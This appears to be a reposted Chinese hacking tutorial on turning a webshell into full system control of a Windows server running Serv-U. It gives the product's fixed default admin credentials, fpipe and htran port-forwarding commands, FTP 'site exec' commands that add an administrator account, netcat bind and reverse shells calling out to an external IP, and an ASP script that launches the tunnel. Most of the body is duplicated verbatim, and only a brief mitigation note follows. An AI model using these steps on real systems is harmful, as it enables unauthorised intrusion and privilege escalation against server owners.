Webshell与Serv-u结合获系统最高权限
Serv-U默认监听127.0.0.1:43958,在本机才能连接这个管理端口,Serv-U默认管理账号是localAdministrator,默认密码是"#l@$ak#.lk;0@P",这个密码是固定的。在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用"Serv-U administrator"新建SERVER。 目标IP:12345 User:LocalAdministrator Pass:"#l@$ak#.lk;0@P"0 那么目标机器的Serv-U就归你管了。 利用的前提:要有目标机器的普通权限的SHELL,不需要能终端或物理控制台登录,只要有个shell,能运行端口数据转发的程序就可以了 如何得到一个shell:sql注射得到webshell或者直接利用动网7.0 sp2以下的上传漏洞上传webshell 具体实施方法 1.利用得到的webshell上传转向程序fpipe,然后执行fpipe -v -l 12345 -r 43958 127.0.0.1 2 .在你自己的机器,用"Serv-U administrator"新建SERVER,依次填入 ip:目标IP 端口 :12345 User:LocalAdministrator Pass:"#l@$ak#.lk;0@P" 现在你就可以管理这台服务器的Serv-U了,新建一个账号,权限为系统管理员(system dministrator),并在"目录访问(Dir access)"选项中给予"执行"权限(execute). 3. ftp连接,然后执行
quote site exec net user iisuser password /add
添加一个用户名为iisuser密码为password的用户,加到管理员组 quote site exec net localgroup administrators iisuser /add,现在就可以连接终端并登录了。 当然也可以进行别的操作,例如上传一个nc.exe,在目标机器上得到一个管理员权限的shell,可以正向连接,也可以反向连接。 正向连接:连上ftp以后执行
quote site exec nc.exe -l -p 23 -t -e cmd.exe
这时目标主机就成了一台telnet服务器,你可以telnet上目标服务器的23端口. 反向连接:假设你的IP是202.96.209.168 1.先在自己的机器上运行(你要有一个外部IP):nc -vv -lp 99 2.在目标机器上运行 nc -e cmd.exe 202.96.209.168 99 在你的机器上就会得到一个目标机器的具有管理员权限的shell 如果对方进行了端口过滤或者设置了防火墙的保护( 这种保护不限制反弹连接,如果限制的话就要换别的方法)可以用TCP SOCKET转发来实现。 打个比方: 我的机器为 A; 我要测试的机器为 B[不允许正面连接]; 我已经在B上得到呢一个SHELL[只要guest的就行呢]? 我们可以这样连上对方的43958: I:我在本地监听二个端口23和56 23是等待B来连接的; 56是等待我来连接的; II:B连接我监听的23,同时转发到本地的43958 这样管道就建好呢~对方的防火墙就拿我们没有办法呢? 此时在本地运行Serv-U新建一个SERVER,IP填上本地的127.0.0.1端口为56用户localAdministrator,密码#l@$ak#.lk;0@P。 具体实施方法 假设你的IP是 202.96.209.168 1.在你自己的机器上运行 htran.exe -listen 23 56; 2.此时在本地运行Serv-U新建一个SERVER,IP填上本地的127.0.0.1端口为56,用户名LocalAdministrator,密码#l@$ak#.lk;0@P; 3。在目标机器上运行 htran.exe -slave 127.0.0.1 43958 202.96.209.168 23 如果不能在webshell下直接运行,可以写一个asp脚本来执行,内容如下:
connect.asp
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
oScript.Run (server.mappath("htran")&" -slave 127.0.0.1 43958 202.96.209.168 23 ")
%>
执行http://目标网址/connect.asp,如果出来一片空白,没提示什么错误,现在你应该可以管理目标服务器的Serv-U了,余下的事情就看您自由发挥了。htran.exe是一个多线程包转发工具,可以到红盟下载 防止方法 自己给Serv-U打补丁,改变默认端口及管理密码。修改 ServUAdmin.exe、ServUDaemon.exe这两个文件,改端口只要在ServUDaemon.ini文件[GLOBAL]选项中加入LocalSetupPortNo=12345即可 很遗憾,在Serv-U的最新版本Serv-U 5.2.0.0中依然没有任何改变,默认的管理端口及密码还是原来的。
quote site exec net user iisuser password /add
添加一个用户名为iisuser密码为password的用户,加到管理员组 quote site exec net localgroup administrators iisuser /add,现在就可以连接终端并登录了。 当然也可以进行别的操作,例如上传一个nc.exe,在目标机器上得到一个管理员权限的shell,可以正向连接,也可以反向连接。 正向连接:连上ftp以后执行
quote site exec nc.exe -l -p 23 -t -e cmd.exe
这时目标主机就成了一台telnet服务器,你可以telnet上目标服务器的23端口. 反向连接:假设你的IP是202.96.209.168 1.先在自己的机器上运行(你要有一个外部IP):nc -vv -lp 99 2.在目标机器上运行 nc -e cmd.exe 202.96.209.168 99 在你的机器上就会得到一个目标机器的具有管理员权限的shell 如果对方进行了端口过滤或者设置了防火墙的保护( 这种保护不限制反弹连接,如果限制的话就要换别的方法)可以用TCP SOCKET转发来实现。 打个比方: 我的机器为 A; 我要测试的机器为 B[不允许正面连接]; 我已经在B上得到呢一个SHELL[只要guest的就行呢]? 我们可以这样连上对方的43958: I:我在本地监听二个端口23和56 23是等待B来连接的; 56是等待我来连接的; II:B连接我监听的23,同时转发到本地的43958 这样管道就建好呢~对方的防火墙就拿我们没有办法呢? 此时在本地运行Serv-U新建一个SERVER,IP填上本地的127.0.0.1端口为56用户localAdministrator,密码#l@$ak#.lk;0@P。 具体实施方法 假设你的IP是 202.96.209.168 1.在你自己的机器上运行 htran.exe -listen 23 56; 2.此时在本地运行Serv-U新建一个SERVER,IP填上本地的127.0.0.1端口为56,用户名LocalAdministrator,密码#l@$ak#.lk;0@P; 3。在目标机器上运行 htran.exe -slave 127.0.0.1 43958 202.96.209.168 23 如果不能在webshell下直接运行,可以写一个asp脚本来执行,内容如下:
connect.asp
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
oScript.Run (server.mappath("htran")&" -slave 127.0.0.1 43958 202.96.209.168 23 ")
%>
执行http://目标网址/connect.asp,如果出来一片空白,没提示什么错误,现在你应该可以管理目标服务器的Serv-U了,余下的事情就看您自由发挥了。htran.exe是一个多线程包转发工具,可以到红盟下载 防止方法 自己给Serv-U打补丁,改变默认端口及管理密码。修改 ServUAdmin.exe、ServUDaemon.exe这两个文件,改端口只要在ServUDaemon.ini文件[GLOBAL]选项中加入LocalSetupPortNo=12345即可 很遗憾,在Serv-U的最新版本Serv-U 5.2.0.0中依然没有任何改变,默认的管理端口及密码还是原来的。
相关推荐
jiaxiaokai 2009-09-29
whxwkb 2009-09-29
bluet00 2020-06-25
bigNoseLiu 2020-06-15
Jieen 2020-05-30
酷云的csdn 2020-05-28
Sabrina 2020-04-22
pimshell 2020-04-06
伏雌摘星阁 2020-03-03
懒人的小窝 2011-06-11
Parco的IT运维 2020-02-03
xiaobater 2020-02-02
liushun 2019-12-16
本站服务器经过更换2012版后 网站经常被人拿WEBSHELL篡改文件!找了半天也找不到漏洞在哪好在微信好友Carry的帮忙下找出了漏洞,并给出了以下的修改方案我是根据方案3修复的,在这里给大家分享下
SciRui 2019-12-14
jinkun00 2015-08-17
Yyqingmofeige 2019-11-08